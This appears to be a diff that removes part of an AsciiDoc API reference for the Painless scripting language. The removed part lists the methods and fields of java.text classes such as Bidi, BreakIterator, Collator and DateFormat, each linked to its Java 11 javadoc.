- -[[painless-api-reference-shared-Annotation]] -==== Annotation -* {java11-javadoc}/java.base/java/text/Annotation.html#(java.lang.Object)[Annotation](Object) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/text/Annotation.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AttributedCharacterIterator]] -==== AttributedCharacterIterator -* def {java11-javadoc}/java.base/java/text/CharacterIterator.html#clone()[clone]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#first()[first]() -* Set {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getAllAttributeKeys()[getAllAttributeKeys]() -* def {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getAttribute(java.text.AttributedCharacterIterator$Attribute)[getAttribute](AttributedCharacterIterator.Attribute) -* Map {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getAttributes()[getAttributes]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunLimit()[getRunLimit]() -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunLimit(java.util.Set)[getRunLimit](Set) -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunStart()[getRunStart]() -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunStart(java.util.Set)[getRunStart](Set) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#last()[last]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#next()[next]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#previous()[previous]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#setIndex(int)[setIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AttributedCharacterIterator-Attribute]] -==== AttributedCharacterIterator.Attribute -* static AttributedCharacterIterator.Attribute {java11-javadoc}/java.base/java/text/AttributedCharacterIterator$Attribute.html#INPUT_METHOD_SEGMENT[INPUT_METHOD_SEGMENT] -* static AttributedCharacterIterator.Attribute {java11-javadoc}/java.base/java/text/AttributedCharacterIterator$Attribute.html#LANGUAGE[LANGUAGE] -* static AttributedCharacterIterator.Attribute {java11-javadoc}/java.base/java/text/AttributedCharacterIterator$Attribute.html#READING[READING] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AttributedString]] -==== 
AttributedString -* {java11-javadoc}/java.base/java/text/AttributedString.html#(java.lang.String)[AttributedString](null) -* {java11-javadoc}/java.base/java/text/AttributedString.html#(java.lang.String,java.util.Map)[AttributedString](null, Map) -* void {java11-javadoc}/java.base/java/text/AttributedString.html#addAttribute(java.text.AttributedCharacterIterator$Attribute,java.lang.Object)[addAttribute](AttributedCharacterIterator.Attribute, Object) -* void {java11-javadoc}/java.base/java/text/AttributedString.html#addAttribute(java.text.AttributedCharacterIterator$Attribute,java.lang.Object,int,int)[addAttribute](AttributedCharacterIterator.Attribute, Object, int, int) -* void {java11-javadoc}/java.base/java/text/AttributedString.html#addAttributes(java.util.Map,int,int)[addAttributes](Map, int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/AttributedString.html#getIterator()[getIterator]() -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/AttributedString.html#getIterator(java.text.AttributedCharacterIterator$Attribute%5B%5D)[getIterator](AttributedCharacterIterator.Attribute[]) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/AttributedString.html#getIterator(java.text.AttributedCharacterIterator$Attribute%5B%5D,int,int)[getIterator](AttributedCharacterIterator.Attribute[], int, int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Bidi]] -==== Bidi -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_DEFAULT_LEFT_TO_RIGHT[DIRECTION_DEFAULT_LEFT_TO_RIGHT] -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_DEFAULT_RIGHT_TO_LEFT[DIRECTION_DEFAULT_RIGHT_TO_LEFT] -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_LEFT_TO_RIGHT[DIRECTION_LEFT_TO_RIGHT] -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_RIGHT_TO_LEFT[DIRECTION_RIGHT_TO_LEFT] -* static void {java11-javadoc}/java.base/java/text/Bidi.html#reorderVisually(byte%5B%5D,int,java.lang.Object%5B%5D,int,int)[reorderVisually](byte[], int, Object[], int, int) -* static boolean {java11-javadoc}/java.base/java/text/Bidi.html#requiresBidi(char%5B%5D,int,int)[requiresBidi](char[], int, int) -* {java11-javadoc}/java.base/java/text/Bidi.html#(java.text.AttributedCharacterIterator)[Bidi](AttributedCharacterIterator) -* {java11-javadoc}/java.base/java/text/Bidi.html#(java.lang.String,int)[Bidi](null, int) -* {java11-javadoc}/java.base/java/text/Bidi.html#(char%5B%5D,int,byte%5B%5D,int,int,int)[Bidi](char[], int, byte[], int, int, int) -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#baseIsLeftToRight()[baseIsLeftToRight]() -* Bidi {java11-javadoc}/java.base/java/text/Bidi.html#createLineBidi(int,int)[createLineBidi](int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getBaseLevel()[getBaseLevel]() -* int {java11-javadoc}/java.base/java/text/Bidi.html#getLength()[getLength]() -* int {java11-javadoc}/java.base/java/text/Bidi.html#getLevelAt(int)[getLevelAt](int) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunCount()[getRunCount]() -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunLevel(int)[getRunLevel](int) -* int 
{java11-javadoc}/java.base/java/text/Bidi.html#getRunLimit(int)[getRunLimit](int) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunStart(int)[getRunStart](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#isLeftToRight()[isLeftToRight]() -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#isMixed()[isMixed]() -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#isRightToLeft()[isRightToLeft]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BreakIterator]] -==== BreakIterator -* static int {java11-javadoc}/java.base/java/text/BreakIterator.html#DONE[DONE] -* static Locale[] {java11-javadoc}/java.base/java/text/BreakIterator.html#getAvailableLocales()[getAvailableLocales]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getCharacterInstance()[getCharacterInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getCharacterInstance(java.util.Locale)[getCharacterInstance](Locale) -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getLineInstance()[getLineInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getLineInstance(java.util.Locale)[getLineInstance](Locale) -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getSentenceInstance()[getSentenceInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getSentenceInstance(java.util.Locale)[getSentenceInstance](Locale) -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getWordInstance()[getWordInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getWordInstance(java.util.Locale)[getWordInstance](Locale) -* def {java11-javadoc}/java.base/java/text/BreakIterator.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#first()[first]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#following(int)[following](int) -* CharacterIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getText()[getText]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/BreakIterator.html#isBoundary(int)[isBoundary](int) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#last()[last]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#next()[next]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#next(int)[next](int) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#preceding(int)[preceding](int) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#previous()[previous]() -* void {java11-javadoc}/java.base/java/text/BreakIterator.html#setText(java.lang.String)[setText](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CharacterIterator]] -==== CharacterIterator -* static char {java11-javadoc}/java.base/java/text/CharacterIterator.html#DONE[DONE] -* def {java11-javadoc}/java.base/java/text/CharacterIterator.html#clone()[clone]() -* char 
{java11-javadoc}/java.base/java/text/CharacterIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#first()[first]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#last()[last]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#next()[next]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#previous()[previous]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#setIndex(int)[setIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ChoiceFormat]] -==== ChoiceFormat -* static double {java11-javadoc}/java.base/java/text/ChoiceFormat.html#nextDouble(double)[nextDouble](double) -* static double {java11-javadoc}/java.base/java/text/ChoiceFormat.html#nextDouble(double,boolean)[nextDouble](double, boolean) -* static double {java11-javadoc}/java.base/java/text/ChoiceFormat.html#previousDouble(double)[previousDouble](double) -* {java11-javadoc}/java.base/java/text/ChoiceFormat.html#(java.lang.String)[ChoiceFormat](null) -* {java11-javadoc}/java.base/java/text/ChoiceFormat.html#(double%5B%5D,java.lang.String%5B%5D)[ChoiceFormat](double[], null[]) -* void {java11-javadoc}/java.base/java/text/ChoiceFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Currency {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrency()[getCurrency]() -* def[] {java11-javadoc}/java.base/java/text/ChoiceFormat.html#getFormats()[getFormats]() -* double[] {java11-javadoc}/java.base/java/text/ChoiceFormat.html#getLimits()[getLimits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumFractionDigits()[getMaximumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumIntegerDigits()[getMaximumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumFractionDigits()[getMinimumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumIntegerDigits()[getMinimumIntegerDigits]() -* RoundingMode {java11-javadoc}/java.base/java/text/NumberFormat.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isGroupingUsed()[isGroupingUsed]() -* boolean 
{java11-javadoc}/java.base/java/text/NumberFormat.html#isParseIntegerOnly()[isParseIntegerOnly]() -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String)[parse](null) -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/ChoiceFormat.html#setChoices(double%5B%5D,java.lang.String%5B%5D)[setChoices](double[], null[]) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setGroupingUsed(boolean)[setGroupingUsed](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumFractionDigits(int)[setMaximumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumIntegerDigits(int)[setMaximumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumFractionDigits(int)[setMinimumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumIntegerDigits(int)[setMinimumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setParseIntegerOnly(boolean)[setParseIntegerOnly](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setRoundingMode(java.math.RoundingMode)[setRoundingMode](RoundingMode) -* null {java11-javadoc}/java.base/java/text/ChoiceFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CollationElementIterator]] -==== CollationElementIterator -* static int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#NULLORDER[NULLORDER] -* static int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#primaryOrder(int)[primaryOrder](int) -* static short {java11-javadoc}/java.base/java/text/CollationElementIterator.html#secondaryOrder(int)[secondaryOrder](int) -* static short {java11-javadoc}/java.base/java/text/CollationElementIterator.html#tertiaryOrder(int)[tertiaryOrder](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#getMaxExpansion(int)[getMaxExpansion](int) -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#getOffset()[getOffset]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#next()[next]() -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#previous()[previous]() -* void {java11-javadoc}/java.base/java/text/CollationElementIterator.html#reset()[reset]() -* void {java11-javadoc}/java.base/java/text/CollationElementIterator.html#setOffset(int)[setOffset](int) -* void {java11-javadoc}/java.base/java/text/CollationElementIterator.html#setText(java.lang.String)[setText](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CollationKey]] -==== CollationKey -* int 
{java11-javadoc}/java.base/java/text/CollationKey.html#compareTo(java.text.CollationKey)[compareTo](CollationKey) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/CollationKey.html#getSourceString()[getSourceString]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* byte[] {java11-javadoc}/java.base/java/text/CollationKey.html#toByteArray()[toByteArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collator]] -==== Collator -* static int {java11-javadoc}/java.base/java/text/Collator.html#CANONICAL_DECOMPOSITION[CANONICAL_DECOMPOSITION] -* static int {java11-javadoc}/java.base/java/text/Collator.html#FULL_DECOMPOSITION[FULL_DECOMPOSITION] -* static int {java11-javadoc}/java.base/java/text/Collator.html#IDENTICAL[IDENTICAL] -* static int {java11-javadoc}/java.base/java/text/Collator.html#NO_DECOMPOSITION[NO_DECOMPOSITION] -* static int {java11-javadoc}/java.base/java/text/Collator.html#PRIMARY[PRIMARY] -* static int {java11-javadoc}/java.base/java/text/Collator.html#SECONDARY[SECONDARY] -* static int {java11-javadoc}/java.base/java/text/Collator.html#TERTIARY[TERTIARY] -* static Locale[] {java11-javadoc}/java.base/java/text/Collator.html#getAvailableLocales()[getAvailableLocales]() -* static Collator {java11-javadoc}/java.base/java/text/Collator.html#getInstance()[getInstance]() -* static Collator {java11-javadoc}/java.base/java/text/Collator.html#getInstance(java.util.Locale)[getInstance](Locale) -* def {java11-javadoc}/java.base/java/text/Collator.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Comparator.html#compare(java.lang.Object,java.lang.Object)[compare](def, def) -* boolean {java11-javadoc}/java.base/java/util/Comparator.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/text/Collator.html#equals(java.lang.String,java.lang.String)[equals](null, null) -* CollationKey {java11-javadoc}/java.base/java/text/Collator.html#getCollationKey(java.lang.String)[getCollationKey](null) -* int {java11-javadoc}/java.base/java/text/Collator.html#getDecomposition()[getDecomposition]() -* int {java11-javadoc}/java.base/java/text/Collator.html#getStrength()[getStrength]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reversed()[reversed]() -* void {java11-javadoc}/java.base/java/text/Collator.html#setDecomposition(int)[setDecomposition](int) -* void {java11-javadoc}/java.base/java/text/Collator.html#setStrength(int)[setStrength](int) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.Comparator)[thenComparing](Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.function.Function,java.util.Comparator)[thenComparing](Function, Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingDouble(java.util.function.ToDoubleFunction)[thenComparingDouble](ToDoubleFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingInt(java.util.function.ToIntFunction)[thenComparingInt](ToIntFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingLong(java.util.function.ToLongFunction)[thenComparingLong](ToLongFunction) -* null 
{java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateFormat]] -==== DateFormat -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#AM_PM_FIELD[AM_PM_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DATE_FIELD[DATE_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DAY_OF_WEEK_FIELD[DAY_OF_WEEK_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DAY_OF_WEEK_IN_MONTH_FIELD[DAY_OF_WEEK_IN_MONTH_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DAY_OF_YEAR_FIELD[DAY_OF_YEAR_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DEFAULT[DEFAULT] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#ERA_FIELD[ERA_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#FULL[FULL] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR0_FIELD[HOUR0_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR1_FIELD[HOUR1_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR_OF_DAY0_FIELD[HOUR_OF_DAY0_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR_OF_DAY1_FIELD[HOUR_OF_DAY1_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#LONG[LONG] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MEDIUM[MEDIUM] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MILLISECOND_FIELD[MILLISECOND_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MINUTE_FIELD[MINUTE_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MONTH_FIELD[MONTH_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#SECOND_FIELD[SECOND_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#SHORT[SHORT] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#TIMEZONE_FIELD[TIMEZONE_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#WEEK_OF_MONTH_FIELD[WEEK_OF_MONTH_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#WEEK_OF_YEAR_FIELD[WEEK_OF_YEAR_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#YEAR_FIELD[YEAR_FIELD] -* static Locale[] {java11-javadoc}/java.base/java/text/DateFormat.html#getAvailableLocales()[getAvailableLocales]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateInstance()[getDateInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateInstance(int)[getDateInstance](int) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateInstance(int,java.util.Locale)[getDateInstance](int, Locale) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateTimeInstance()[getDateTimeInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateTimeInstance(int,int)[getDateTimeInstance](int, int) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateTimeInstance(int,int,java.util.Locale)[getDateTimeInstance](int, int, Locale) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getInstance()[getInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeInstance()[getTimeInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeInstance(int)[getTimeInstance](int) 
-* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeInstance(int,java.util.Locale)[getTimeInstance](int, Locale) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Calendar {java11-javadoc}/java.base/java/text/DateFormat.html#getCalendar()[getCalendar]() -* NumberFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getNumberFormat()[getNumberFormat]() -* TimeZone {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/DateFormat.html#isLenient()[isLenient]() -* Date {java11-javadoc}/java.base/java/text/DateFormat.html#parse(java.lang.String)[parse](null) -* Date {java11-javadoc}/java.base/java/text/DateFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setCalendar(java.util.Calendar)[setCalendar](Calendar) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setNumberFormat(java.text.NumberFormat)[setNumberFormat](NumberFormat) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateFormat-Field]] -==== DateFormat.Field -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#AM_PM[AM_PM] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_MONTH[DAY_OF_MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_WEEK[DAY_OF_WEEK] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_WEEK_IN_MONTH[DAY_OF_WEEK_IN_MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_YEAR[DAY_OF_YEAR] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#ERA[ERA] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR0[HOUR0] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR1[HOUR1] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR_OF_DAY0[HOUR_OF_DAY0] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR_OF_DAY1[HOUR_OF_DAY1] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#MILLISECOND[MILLISECOND] -* static DateFormat.Field 
{java11-javadoc}/java.base/java/text/DateFormat$Field.html#MINUTE[MINUTE] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#MONTH[MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#SECOND[SECOND] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#TIME_ZONE[TIME_ZONE] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#WEEK_OF_MONTH[WEEK_OF_MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#WEEK_OF_YEAR[WEEK_OF_YEAR] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#YEAR[YEAR] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#ofCalendarField(int)[ofCalendarField](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/DateFormat$Field.html#getCalendarField()[getCalendarField]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateFormatSymbols]] -==== DateFormatSymbols -* static Locale[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getAvailableLocales()[getAvailableLocales]() -* static DateFormatSymbols {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getInstance()[getInstance]() -* static DateFormatSymbols {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getInstance(java.util.Locale)[getInstance](Locale) -* {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#()[DateFormatSymbols]() -* {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#(java.util.Locale)[DateFormatSymbols](Locale) -* def {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getAmPmStrings()[getAmPmStrings]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getEras()[getEras]() -* null {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getLocalPatternChars()[getLocalPatternChars]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getMonths()[getMonths]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getShortMonths()[getShortMonths]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getShortWeekdays()[getShortWeekdays]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getWeekdays()[getWeekdays]() -* null[][] 